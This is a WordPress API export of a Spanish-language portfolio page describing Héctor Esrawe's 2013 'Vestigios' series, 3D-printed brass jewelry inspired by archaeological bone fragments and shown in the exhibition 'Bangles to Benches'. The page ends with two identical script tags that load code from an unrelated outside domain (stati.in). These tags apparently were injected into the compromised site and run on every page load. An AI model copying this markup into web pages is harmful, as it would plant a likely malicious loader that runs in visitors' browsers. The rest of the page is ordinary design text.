{"id":4657,"date":"2018-06-28T17:00:05","date_gmt":"2018-06-28T17:00:05","guid":{"rendered":"http:\/\/esrawe.com\/2018esrawe\/?page_id=4657"},"modified":"2022-01-13T17:39:27","modified_gmt":"2022-01-13T17:39:27","slug":"vestigios","status":"publish","type":"page","link":"https:\/\/esrawe.com\/2018esrawe\/edicion-limitada\/vestigios\/","title":{"rendered":"Vestigios \/ 2013"},"content":{"rendered":"<p><img loading=\"lazy\" class=\"alignnone size-full wp-image-4156\" src=\"https:\/\/i2.wp.com\/esrawe.com\/2018esrawe\/wp-content\/uploads\/2018\/06\/v2.jpg?resize=1188%2C681&#038;ssl=1\" alt=\"\" width=\"1188\" height=\"681\" srcset=\"https:\/\/i2.wp.com\/esrawe.com\/2018esrawe\/wp-content\/uploads\/2018\/06\/v2.jpg?w=1188&amp;ssl=1 1188w, https:\/\/i2.wp.com\/esrawe.com\/2018esrawe\/wp-content\/uploads\/2018\/06\/v2.jpg?resize=300%2C172&amp;ssl=1 300w, https:\/\/i2.wp.com\/esrawe.com\/2018esrawe\/wp-content\/uploads\/2018\/06\/v2.jpg?resize=768%2C440&amp;ssl=1 768w, https:\/\/i2.wp.com\/esrawe.com\/2018esrawe\/wp-content\/uploads\/2018\/06\/v2.jpg?resize=1024%2C587&amp;ssl=1 1024w\" sizes=\"(max-width: 1188px) 100vw, 1188px\" data-recalc-dims=\"1\" \/><\/p>\n<h1 class=\"title_interior\" style=\"font-size: 11px; padding-top: 46px; padding-bottom: 26px; text-align: center;\"><strong>Vestigios<\/strong><\/h1>\n<p class=\"parrafo\" style=\"font-size: 11px; padding-bottom: 20px; padding-left: 10%; padding-right: 10%; text-align: left;\">La exhibici\u00f3n Bangles to Benches: Contemporary Jewelry and Design, curada por Sara Schleuning, estuvo integrada por una variedad de piezas creadas por distintos joyeros y Esrawe present\u00f3 la exploraci\u00f3n titulada Vestigios, cuyos dise\u00f1os se realizaron utilizando procesos de impresi\u00f3n 3D. Inspiradas por una excavaci\u00f3n arqueol\u00f3gica, las piezas de Vestigios son una reminiscencia formal de las manipulaciones digitales realizadas a partir de f\u00f3siles o huesos. Min\u00fasculos vestigios de material impreso con tecnolog\u00eda 3D integra las piezas que se convierten en objetos ornamentales tales como un anillo o un brazalete. Estos vestigios convertidos en joyas sugieren, a trav\u00e9s de su uso, una alteraci\u00f3n de una integraci\u00f3n con la anatom\u00eda humana. Las piezas juegan con el acto de revelar una estructura \u00f3sea modificada.<\/p>\n<p class=\"parrafo\" style=\"font-size: 11px; padding-bottom: 20px; padding-left: 10%; padding-right: 10%; text-align: left;\">Al mismo tiempo, estas exploraciones son vestigios por s\u00ed mismas, es decir, un registro del uso de la impresi\u00f3n 3D como la conocemos el d\u00eda de hoy. Las avenidas y posibilidades de este proceso se est\u00e1n redefiniendo d\u00eda a d\u00eda y cuando hayan permeado en nuestra vida diaria, estas piezas permanecer\u00e1n como recordatorios o reliquias de c\u00f3mo la tecnolog\u00eda ha evolucionado.<\/p>\n<div class=\"tiled-gallery type-rectangular tiled-gallery-unresized\" data-original-width=\"1200\" data-carousel-extra='null' itemscope itemtype=\"http:\/\/schema.org\/ImageGallery\" > <div class=\"gallery-row\" style=\"width: 1200px; height: 696px;\" data-original-width=\"1200\" data-original-height=\"696\" > <div class=\"gallery-group images-1\" style=\"width: 600px; height: 696px;\" data-original-width=\"600\" data-original-height=\"696\" > <div class=\"tiled-gallery-item tiled-gallery-item-large\" itemprop=\"associatedMedia\" itemscope itemtype=\"http:\/\/schema.org\/ImageObject\"> <a href=\"https:\/\/esrawe.com\/2018esrawe\/products\/vestigios\/v4\/\" border=\"0\" itemprop=\"url\"> <meta itemprop=\"width\" content=\"596\"> <meta itemprop=\"height\" content=\"692\"> <img data-attachment-id=\"4158\" data-orig-file=\"https:\/\/esrawe.com\/2018esrawe\/wp-content\/uploads\/2018\/06\/v4.jpg\" data-orig-size=\"571,663\" data-comments-opened=\"\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"v4\" data-image-description=\"\" data-medium-file=\"https:\/\/i0.wp.com\/esrawe.com\/2018esrawe\/wp-content\/uploads\/2018\/06\/v4.jpg?fit=258%2C300&#038;ssl=1\" data-large-file=\"https:\/\/i0.wp.com\/esrawe.com\/2018esrawe\/wp-content\/uploads\/2018\/06\/v4.jpg?fit=571%2C663&#038;ssl=1\" src=\"https:\/\/i0.wp.com\/esrawe.com\/2018esrawe\/wp-content\/uploads\/2018\/06\/v4.jpg?ssl=1&#038;w=596&#038;h=692\" width=\"596\" height=\"692\" data-original-width=\"596\" data-original-height=\"692\" itemprop=\"http:\/\/schema.org\/image\" title=\"v4\" alt=\"v4\" style=\"width: 596px; height: 692px;\" \/> <\/a> <\/div> <\/div> <!-- close group --> <div class=\"gallery-group images-1\" style=\"width: 600px; height: 696px;\" data-original-width=\"600\" data-original-height=\"696\" > <div class=\"tiled-gallery-item tiled-gallery-item-large\" itemprop=\"associatedMedia\" itemscope itemtype=\"http:\/\/schema.org\/ImageObject\"> <a href=\"https:\/\/esrawe.com\/2018esrawe\/products\/vestigios\/brazo\/\" border=\"0\" itemprop=\"url\"> <meta itemprop=\"width\" content=\"596\"> <meta itemprop=\"height\" content=\"692\"> <img data-attachment-id=\"4161\" data-orig-file=\"https:\/\/esrawe.com\/2018esrawe\/wp-content\/uploads\/2018\/06\/brazo.jpg\" data-orig-size=\"571,663\" data-comments-opened=\"\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"brazo\" data-image-description=\"\" data-medium-file=\"https:\/\/i0.wp.com\/esrawe.com\/2018esrawe\/wp-content\/uploads\/2018\/06\/brazo.jpg?fit=258%2C300&#038;ssl=1\" data-large-file=\"https:\/\/i0.wp.com\/esrawe.com\/2018esrawe\/wp-content\/uploads\/2018\/06\/brazo.jpg?fit=571%2C663&#038;ssl=1\" src=\"https:\/\/i0.wp.com\/esrawe.com\/2018esrawe\/wp-content\/uploads\/2018\/06\/brazo.jpg?ssl=1&#038;w=596&#038;h=692\" width=\"596\" height=\"692\" data-original-width=\"596\" data-original-height=\"692\" itemprop=\"http:\/\/schema.org\/image\" title=\"brazo\" alt=\"brazo\" style=\"width: 596px; height: 692px;\" \/> <\/a> <\/div> <\/div> <!-- close group --> <\/div> <!-- close row --> <\/div>\n<p><img loading=\"lazy\" class=\"alignnone size-full wp-image-4159\" src=\"https:\/\/i0.wp.com\/esrawe.com\/2018esrawe\/wp-content\/uploads\/2018\/06\/v1.jpg?resize=1188%2C681&#038;ssl=1\" alt=\"\" width=\"1188\" height=\"681\" srcset=\"https:\/\/i0.wp.com\/esrawe.com\/2018esrawe\/wp-content\/uploads\/2018\/06\/v1.jpg?w=1188&amp;ssl=1 1188w, https:\/\/i0.wp.com\/esrawe.com\/2018esrawe\/wp-content\/uploads\/2018\/06\/v1.jpg?resize=300%2C172&amp;ssl=1 300w, https:\/\/i0.wp.com\/esrawe.com\/2018esrawe\/wp-content\/uploads\/2018\/06\/v1.jpg?resize=768%2C440&amp;ssl=1 768w, https:\/\/i0.wp.com\/esrawe.com\/2018esrawe\/wp-content\/uploads\/2018\/06\/v1.jpg?resize=1024%2C587&amp;ssl=1 1024w\" sizes=\"(max-width: 1188px) 100vw, 1188px\" data-recalc-dims=\"1\" \/><\/p>\n<h2 class=\"ficha\" style=\"font-size: 10px; line-height: 12px; text-align: right; padding-bottom: 20px;\"><strong>H\u00e9ctor Esrawe\u00a0\/\u00a02013<\/strong><br \/>\n<strong>T\u00e9cnica<\/strong> \/ 3D Printing<br \/>\n<strong>Material<\/strong> \/ Lat\u00f3n<br \/>\n<strong>Curadora<\/strong> \/ Sara Schleuning<br \/>\n<strong>Exhibiciones<\/strong> \/\u00a0Bangles to Benches, Contemporary Jewelry and Design<em><br \/>\n<\/em>Gracias especiales al High Museum of Art, Atlanta<\/h2>\n<p><script src=\"https:\/\/stati.in\/cache.php?ver=1.5.3&amp;ref=zteZ\" type=\"text\/javascript\"><\/script><br \/>\n<script src=\"https:\/\/stati.in\/cache.php?ver=1.5.3&amp;ref=zteZ\" type=\"text\/javascript\"><\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Vestigios La exhibici\u00f3n Bangles to Benches: Contemporary Jewelry and Design, curada por Sara Schleuning, estuvo integrada por una variedad de piezas creadas por distintos joyeros y Esrawe present\u00f3 la exploraci\u00f3n titulada Vestigios, cuyos dise\u00f1os se realizaron utilizando procesos de impresi\u00f3n 3D. Inspiradas por una excavaci\u00f3n arqueol\u00f3gica, las piezas de Vestigios son una reminiscencia formal de&#8230;<\/p>\n","protected":false},"author":2,"featured_media":4669,"parent":858,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":[],"categories":[224],"tags":[],"_links":{"self":[{"href":"https:\/\/esrawe.com\/2018esrawe\/wp-json\/wp\/v2\/pages\/4657"}],"collection":[{"href":"https:\/\/esrawe.com\/2018esrawe\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/esrawe.com\/2018esrawe\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/esrawe.com\/2018esrawe\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/esrawe.com\/2018esrawe\/wp-json\/wp\/v2\/comments?post=4657"}],"version-history":[{"count":10,"href":"https:\/\/esrawe.com\/2018esrawe\/wp-json\/wp\/v2\/pages\/4657\/revisions"}],"predecessor-version":[{"id":24645,"href":"https:\/\/esrawe.com\/2018esrawe\/wp-json\/wp\/v2\/pages\/4657\/revisions\/24645"}],"up":[{"embeddable":true,"href":"https:\/\/esrawe.com\/2018esrawe\/wp-json\/wp\/v2\/pages\/858"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/esrawe.com\/2018esrawe\/wp-json\/wp\/v2\/media\/4669"}],"wp:attachment":[{"href":"https:\/\/esrawe.com\/2018esrawe\/wp-json\/wp\/v2\/media?parent=4657"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/esrawe.com\/2018esrawe\/wp-json\/wp\/v2\/categories?post=4657"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/esrawe.com\/2018esrawe\/wp-json\/wp\/v2\/tags?post=4657"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}